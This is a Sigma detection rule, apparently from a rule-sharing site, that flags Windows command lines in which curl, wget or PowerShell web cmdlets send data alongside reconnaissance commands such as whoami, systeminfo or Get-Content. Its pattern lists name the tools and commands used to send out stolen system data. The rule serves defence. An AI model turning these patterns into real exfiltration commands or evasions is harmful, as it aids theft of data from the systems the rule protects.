Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

Sigma rule (View on GitHub)

 1title: Potential Data Exfiltration Activity Via CommandLine Tools
 2id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
 3status: test
 4description: Detects the use of various CLI utilities exfiltrating data via web requests
 5references:
 6    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 7author: Nasreddine Bencherchali (Nextron Systems)
 8date: 2022-08-02
 9modified: 2025-10-19
10tags:
11    - attack.execution
12    - attack.t1059.001
13logsource:
14    category: process_creation
15    product: windows
16detection:
17    selection_iwr:
18        Image|endswith:
19            - '\powershell_ise.exe'
20            - '\powershell.exe'
21            - '\pwsh.exe'
22            - '\cmd.exe'
23        CommandLine|contains:
24            - 'curl '
25            - 'Invoke-RestMethod'
26            - 'Invoke-WebRequest'
27            - 'irm '
28            - 'iwr '
29            - 'wget '
30        CommandLine|contains|all:
31            - ' -ur' # Shortest possible version of the -uri flag
32            - ' -me' # Shortest possible version of the -method flag
33            - ' -b'
34            - ' POST '
35    selection_curl:
36        Image|endswith: '\curl.exe'
37        CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
38    selection_curl_data:
39        CommandLine|contains:
40            - ' -d ' # Shortest possible version of the --data flag
41            - ' --data '
42    selection_wget:
43        Image|endswith: '\wget.exe'
44        CommandLine|contains:
45            - '--post-data'
46            - '--post-file'
47    payloads:
48        - CommandLine|re:
49              - 'net\s+view'
50              - 'sc\s+query'
51        - CommandLine|contains:
52              - 'Get-Content'
53              - 'GetBytes'
54              - 'hostname'
55              - 'ifconfig'
56              - 'ipconfig'
57              - 'netstat'
58              - 'nltest'
59              - 'qprocess'
60              - 'systeminfo'
61              - 'tasklist'
62              - 'ToBase64String'
63              - 'whoami'
64        - CommandLine|contains|all:
65              - 'type '
66              - ' > '
67              - ' C:\'
68    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
69falsepositives:
70    - Unlikely
71level: high

References

Related rules

to-top